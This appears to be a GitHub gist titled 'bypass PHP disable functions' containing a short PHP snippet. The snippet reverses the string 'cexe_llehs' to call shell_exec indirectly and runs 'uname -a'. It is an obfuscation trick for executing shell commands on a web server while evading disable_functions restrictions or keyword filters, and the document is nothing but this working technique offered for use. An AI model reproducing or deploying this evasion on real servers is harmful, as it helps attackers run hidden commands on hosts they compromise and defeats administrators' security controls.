Created
May 8, 2023 16:03
-
-
Save ardhptr21/30eeb494dfd7e006da35c40dfa497c5c to your computer and use it in GitHub Desktop.
bypass PHP disable functions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$n = "cexe_llehs"; | |
$b = strrev($n); | |
print($b('uname -a')); | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment